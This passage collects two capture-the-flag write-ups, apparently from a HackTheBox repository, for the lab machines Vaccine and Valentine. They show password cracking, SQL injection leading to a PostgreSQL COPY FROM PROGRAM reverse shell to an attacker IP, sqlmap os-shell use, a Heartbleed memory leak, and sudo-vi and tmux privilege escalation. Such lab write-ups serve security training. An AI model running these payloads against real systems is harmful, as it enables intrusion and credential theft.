24 | ### Examine Port 80 - Apache Server
25 |
26 | 
27 |
28 | Seems to be a login website. Using the credentials `admin:MEGACORP_4dm1n!!` of the previous challenge fails. So this is a dead end for now.
29 |
30 | Let's try to scan the server for other directories. For this, we can use a tool like `dirb`, `dirbuster` or `gobuster`
31 |
32 | ```
33 | gobuster dir -u "http://10.10.10.46" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
34 | ```
35 |
36 | While this is running, we can check out the open FTP port.
37 |
38 |
39 | ### Examine Port 21 - FTP
40 |
41 | In the previous challenge, we found some FTP credentials in the Filezilla configs that belonged to root.
42 |
43 | ```
44 | ftpuser
45 | mc@F1l3ZilL4
46 | ```
47 |
48 | 
49 |
50 | And indeed! We can login.
51 |
52 | In there, we find a file called `backup.zip`.
53 | ```
54 | -rw-r--r-- 1 0 0 2533 Feb 03 2020 backup.zip
55 | ```
56 | Using the `GET` command we can download it to our local machine. Unfortunately, the zip file is password protected.
57 |
58 | However, we can try to bruteforce the password with `john`.
59 | Therefore, we first have to use the tool `zip2john`. It converts the zip file into a understandable format for john.
60 |
61 | ```
62 | backup.zip:$pkzip2$2*2*1*0*8*24*3a41*5722*543fb.....
63 | ```
64 |
65 | Afterwards, we can use `john` to crack the hash.
66 |
67 | ```
68 | $ john backup_hash -w=/usr/share/wordlists/rockyou.txt
69 | Using default input encoding: UTF-8
70 | Loaded 1 password hash (PKZIP [32/64])
71 | Press 'q' or Ctrl-C to abort, almost any other key for status
72 | 741852963 (backup.zip)
73 | 1g 0:00:00:00 DONE (2021-01-02 12:26) 50.00g/s 44800p/s 44800c/s 44800C/s michelle1..ilovegod
74 | Use the "--show" option to display all of the cracked passwords reliably
75 | Session completed
76 | ```
77 |
78 | Success! The password for the zip is `741852963`.
79 |
80 | Unzipping the file, we receive two files:
81 |
82 | 1) index.php
83 | 2) style.css
84 |
85 | Opening the `index.php` file we see following:
86 | ```html
87 |
88 |
MegaCorp Login
89 |
90 |
91 |
92 | ```
93 | That seems familiar, right? That's the login page on Port 80.
94 | Let's further investigate the file.
95 |
96 | ```php
97 |
106 | ```
107 | The php code reveals the valid username (`admin`) and the md5 hash of the password (`2cb42f8734ea607eefed3b70af13bbd3`). So all that's left, is to crack the md5 hash.
108 |
109 | For such a task I usually use [crackstation](https://crackstation.net/).
110 |
111 | 
112 |
113 | There we have it! The password is `qwerty789`
114 |
115 | ## Further Examine Port 80 - Login Page
116 |
117 | Using the credentials `admin:qwerty789` we can successfully login and get access to the MegaCorp Car Catalogue (/dashboard.php).
118 |
119 | 
120 |
121 | The dashboard contains information about several Cars. I'm assuming they are loaded from a database. Furthermore, the website only has a SEARCH functionality. Sourcecode, cookies etc did not reveal any interesting information. So what can you do with that SEARCH field?
122 |
123 | Searching for "ELIXIR" (one of the car names), changes the dashboard content, so that only Elixir is shown. If we search for "SPORTS" (one of the car types), the page stays empty.
124 |
125 | So my guess is that, once we hit that SEARCH button, an SQL query is sent to the database, to retrieve all results with the attribute `carname/car/name` set to our value. From an attacker's perspective, this can be vulnerable to SQL Injection if not implemented carefully. So let's try that.
126 |
127 | 
128 |
129 | By inserting a single `'`character into the search field and pressing enter, we get following error message: `ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%'%' ^`. So here we have the proof, that the search field is indeed vulnerable to SQL injection. Let's gain information about the database by following these steps:
130 |
131 | 1) Find out how many columns are in the `cars` table.
132 |
133 | By injecting `' ORDER BY 1--`, and increasing the number until we receive an error, tells us how many columns exist. In our case, we get the error with `' ORDER BY 6--`. Therefore, we know the `cars` table has 5 columns.
134 |
135 | 2) Gain information about the column types
136 |
137 | Now that we know how many columns there are, we can extract further information with the [SQL Injection UNION attack](https://portswigger.net/web-security/sql-injection/union-attacks).
138 |
139 | - `' UNION SELECT 'a', NULL, NULL, NULL, NULL --` : ERROR
140 | - `' UNION SELECT NULL, 'a', NULL, NULL, NULL --` : VALID
141 | - `' UNION SELECT NULL, NULL, 'a', NULL, NULL --` : VALID
142 | - `' UNION SELECT NULL, NULL, NULL, 'a', NULL --` : VALID
143 | - `' UNION SELECT NULL, NULL, NULL, NULL, 'a' --` : VALID
144 |
145 | From this, we know that we can extract valuable information in form of strings when modifying index 1-4 of the UNION query.
146 |
147 | 3) Extract valuable information (table names etc)
148 |
149 | Using the [Portswigger SQLI Cheatsheet](https://portswigger.net/web-security/sql-injection/cheat-sheet), we can retrieve a lot of information about the database system:
150 |
151 | - Version: `' UNION SELECT NULL, NULL, NULL , NULL, VERSION() --`: PostgreSQL 11.5 (Ubuntu 11.5-1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.1.0-9ubuntu2) 9.1.0, 64-bit
152 | - Table names: `' UNION SELECT NULL, table_schema, table_name, NULL, NULL FROM information_schema.tables --`
153 |
154 | 4) Executing Arbitrary Commands via SQL Injection in PostgreSQL
155 |
156 | According to [this article](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5), all versions of PostgreSQL from 9.3, are vulnerable to this kind of arbitrary command execution (CVE-2019-9193)
157 | ```
158 | '; CREATE TABLE cmd_exec(cmd_output text); --
159 |
160 | '; COPY cmd_exec FROM PROGRAM 'bash -c ''bash -i >& /dev/tcp/10.10.14.55/4444 0>&1'''; --
161 |
162 | (if output is needed)
163 | '; SELECT * FROM cmd_exec; -- (make sure the column number is correct)
164 | ```
165 |
166 | 5) PROFIT
167 |
168 | 
169 |
170 | We now have access to the server!
171 |
172 | Btw, this all could have also been done automatically by using `sqlmap`, but for the sake of learning: keep doing it manually!
173 |
174 | ```
175 | $ sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vmnafl0uct1r97s1k5bkpoiopg" --dump-all --tamper=space2comment
176 |
177 | and
178 |
179 | $ sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vmnafl0uct1r97s1k5bkpoiopg" --os-shell
180 | ```
181 |
182 | ## Exploitation
183 |
184 | In the home directory of our current user (/var/lib/postgresql), we can find a file called `user.txt`. It contains the user flag for the machine: `139d3e5c3db18073d250ce0dccc43997`.
185 | Furthermore, the directory also contains the the `.ssh` directory, in which the private and public SSH key of the user are located. We can use them to stablize our current connection.
186 |
187 | ```
188 | $ chmod 600 ssh_key (private one)
189 |
190 | $ ssh -i postgres_sshkey postgres@10.10.10.46
191 | ```
192 |
193 | In the `/var/www/html` directory, we can also find the source code for the `dashboard.php`. Let's take a look at the vulnerable SQL query.
194 |
195 | ``` php
196 | $q = "Select * from cars where name ilike '%". $_REQUEST["search"] ."%'";
197 | ```
198 |
199 | So it's basically just appending our user input to the SQL query, which is, as seen, a very bad idea. There must be some security measurements in place, such as user-input validation.
200 |
201 | Furthermore, we can also see the credentials of our current user `postgres`:
202 |
203 | ```php
204 | $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
205 | ```
206 |
207 | Having that, we can now check the sudoers list to see if our current user can execute a binary with sudo privileges:
208 |
209 | ```
210 | postgres@vaccine:/var/www/html$ sudo -l
211 | [sudo] password for postgres:
212 | Matching Defaults entries for postgres on vaccine:
213 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
214 |
215 | User postgres may run the following commands on vaccine:
216 | (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
217 | ```
218 |
219 | Indeed! We can execute `/bin/vi` on a specific file with sudo privileges. However, we can also start a shell from within `vi`and escape this restriction.
220 |
221 | We execute:
222 | ```
223 | sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
224 | ```
225 | Once, we are in the file editor, we press ESC and type:
226 |
227 | ```
228 | :!/bin/sh
229 |
230 | or
231 |
232 | :shell
233 | ```
234 |
235 | Now we have full root access:
236 |
237 | ```
238 | root@vaccine:/var/www/html# id
239 | uid=0(root) gid=0(root) groups=0(root)
240 | ```
241 |
242 | The root.txt is: `dd6e058e814260bc70e9bbdef2715849`
243 |
--------------------------------------------------------------------------------
/Vaccine/pics/apache_server.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/apache_server.png
--------------------------------------------------------------------------------
/Vaccine/pics/crackstation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/crackstation.png
--------------------------------------------------------------------------------
/Vaccine/pics/ftp_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/ftp_login.png
--------------------------------------------------------------------------------
/Vaccine/pics/megacorp_car_catalogue.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/megacorp_car_catalogue.png
--------------------------------------------------------------------------------
/Vaccine/pics/reverse_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/reverse_shell.png
--------------------------------------------------------------------------------
/Vaccine/pics/test_sqli.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/test_sqli.png
--------------------------------------------------------------------------------
/Valentine/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # Valentine (Linux)
4 |
5 | ## Enumeration
6 |
7 | ```
8 | rustscan --ulimit 5000 10.129.1.190 -- -sC -sV -o port_scan
9 |
10 |
11 | PORT STATE SERVICE REASON VERSION
12 | 22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
13 | 80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))
14 | | http-methods:
15 | |_ Supported Methods: GET HEAD POST OPTIONS
16 | |_http-server-header: Apache/2.2.22 (Ubuntu)
17 | |_http-title: Site doesn't have a title (text/html).
18 | 443/tcp open ssl/http syn-ack Apache httpd 2.2.22 ((Ubuntu))
19 | | http-methods:
20 | |_ Supported Methods: GET HEAD POST OPTIONS
21 | |_http-server-header: Apache/2.2.22 (Ubuntu)
22 | |_http-title: Site doesn't have a title (text/html).
23 | | ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
24 | | Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
25 | ```
26 |
27 | ### Examine Port 80 - Apache webserver
28 |
29 | 
30 |
31 | ```
32 | └──╼ $ gobuster dir -u 10.129.1.190 -w /usr/share/wordlists/dirb/common.txt
33 | ===============================================================
34 | Gobuster v3.0.1
35 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
36 | ===============================================================
37 | [+] Url: http://10.129.1.190
38 | [+] Threads: 10
39 | [+] Wordlist: /usr/share/wordlists/dirb/common.txt
40 | [+] Status codes: 200,204,301,302,307,401,403
41 | [+] User Agent: gobuster/3.0.1
42 | [+] Timeout: 10s
43 | ===============================================================
44 | 2021/01/26 12:55:32 Starting gobuster
45 | ===============================================================
46 | /.hta (Status: 403)
47 | /.htaccess (Status: 403)
48 | /.htpasswd (Status: 403)
49 | /cgi-bin/ (Status: 403)
50 | /decode (Status: 200)
51 | /dev (Status: 301)
52 | /encode (Status: 200)
53 | /index (Status: 200)
54 | /index.php (Status: 200)
55 | /server-status (Status: 403)
56 | ```
57 |
58 | Let's check out the found results one by one
59 |
60 | #### Check: /cgi-bin/
61 |
62 | The typical vulnerability that comes with the exposed /cgi/bin directory, is Shellshock. It enables RCE and must therefore carefully investigated.
63 |
64 | However, it seems like no scripts are in there. At least I did not find them with any wordlist.
65 |
66 | ### Check: /decode & /encode
67 |
68 | 
69 |
70 | Here, we see some kind of service, that offers "Secure Data Decryption". We also have an Encoder service at /encode
71 |
72 | 
73 |
74 | ### Check: /dev
75 |
76 | The dev directory leaks two very interesting files.
77 | - hype_key: contains an apparently hex encoded string. When converting it to ascii, we can see it's a encrypted RSA private key. Probably for ssh.
78 | - notes.txt:
79 | ```
80 | To do:
81 |
82 | 1) Coffee.
83 | 2) Research.
84 | 3) Fix decoder/encoder before going live.
85 | 4) Make sure encoding/decoding is only done client-side.
86 | 5) Don't use the decoder/encoder until any of this is done.
87 | 6) Find a better way to take notes.
88 | ```
89 | So apparently the decoder and encoder services do have some issues. Let's investiate them further. If we get stuck, we can still try the way of bruteforcing the RSA key password.
90 |
91 |
92 | ## Investigating the Decoder and Encoder Service
93 |
94 | Testing the encoder, reveals that it's a simple base64 encoder.
95 |
96 | ```
97 | Your input:
98 | test
99 | Your encoded input:
100 | dGVzdA==
101 | ```
102 |
103 | Same counts for the decoder. It's able to decode base64:
104 |
105 | ```
106 | Your input:
107 | dGVzdA==
108 | Your encoded input:
109 | test
110 | ```
111 |
112 | So what could be the issue with this application? In the note it is stated `"Make sure encoding/decoding is only done client-side"`. Maybe we have some kind of "eval" on the backened that executes the `base64` command. If so, then we could insert a payload and force it to execute it. Let's try that.
113 |
114 | Unfortunately, that's not the case. Hmm... what else could the issue be? Why would the note say it should only be done client-side? While looking through the different directories without having any idea what I missed, I recognized the picture that we saw on the index.html page. It's a big red heart, which is the logo of a very well known software bug, the Heartbleed bug.
115 |
116 |
117 | *The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users. (https://heartbleed.com/#:~:text=The%20Heartbleed%20Bug%20is%20a,used%20to%20secure%20the%20Internet.)*
118 |
119 | If the data of encryption and decryption service is also executed server side, then we could leak previous requests to it, as they could still remain in the memory! Maybe it contains some valuable information. Let's try it!
120 |
121 | ## Gainining an Initial Foothold
122 |
123 | As there exist tons of already working scripts, we can simply use one of them e.g. [this one](https://gist.github.com/eelsivart/10174134).
124 | ```
125 | └──╼ $ python2 heartbleed.py 10.129.1.190 -p 443
126 |
127 | defribulator v1.16
128 | A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
129 |
130 | ##################################################################
131 | Connecting to: 10.129.1.190:443, 1 times
132 | Sending Client Hello for TLSv1.0
133 | Received Server Hello for TLSv1.0
134 |
135 | WARNING: 10.129.1.190:443 returned more data than it should - server is vulnerable!
136 | Please wait... connection attempt 1 of 1
137 | ##################################################################
138 |
139 | .@....SC[...r....+..H...9...
140 | ....w.3....f...
141 | ...!.9.8.........5...............
142 | .........3.2.....E.D...../...A.................................I.........
143 | ...........
144 | ...................................#.......0.0.1/decode.php
145 | Content-Type: application/x-www-form-urlencoded
146 | Content-Length: 42
147 |
148 | $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==...r.i...u........yO
149 | ```
150 |
151 | And indeed! It dumps memory of a previously requested decoding/encoding of another user!
152 |
153 | Let's decode it and see what the plaintext is:
154 |
155 | ```
156 | echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
157 |
158 | heartbleedbelievethehype
159 | ```
160 |
161 | This looks like a password! As we have an encrypted rsa key, which was stored in `hype_key`, we can also now safely assume, that the username is probably `hype`.
162 |
163 | Using openssl + the obtained password, we can now decrypt the key.
164 |
165 | ```
166 | openssl rsa -in encrpted_key -out hype_ssh_key
167 | ```
168 |
169 | Afterwards we use it to connect to the server as user hype.
170 |
171 | ```
172 | ssh -i hype_ssh_key hype@10.129.1.190
173 |
174 | hype@Valentine:~$ hostname && id
175 | Valentine
176 | uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare)
177 | ```
178 |
179 | ## Privilege Escalation
180 |
181 | Running linpeas, we see that root has an open tmux session located in `/.dev/dev_sess`. As our user has permissions to that file, we can simply attach to it with:
182 |
183 | ```
184 | tmux -S /.dev/dev_sess
185 | ```
186 |
187 | And we are root!
188 | ```
189 | root@Valentine:/.devs# hostname && id
190 | Valentine
191 | uid=0(root) gid=0(root) groups=0(root)
192 | ```
--------------------------------------------------------------------------------
/Valentine/pics/apache80.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Valentine/pics/apache80.png
--------------------------------------------------------------------------------
/Valentine/pics/decoder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Valentine/pics/decoder.png
--------------------------------------------------------------------------------
/Valentine/pics/dev.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Valentine/pics/dev.png
--------------------------------------------------------------------------------
/Valentine/pics/encoder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Valentine/pics/encoder.png
--------------------------------------------------------------------------------
/Valentine/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Valentine/pics/logo.png
--------------------------------------------------------------------------------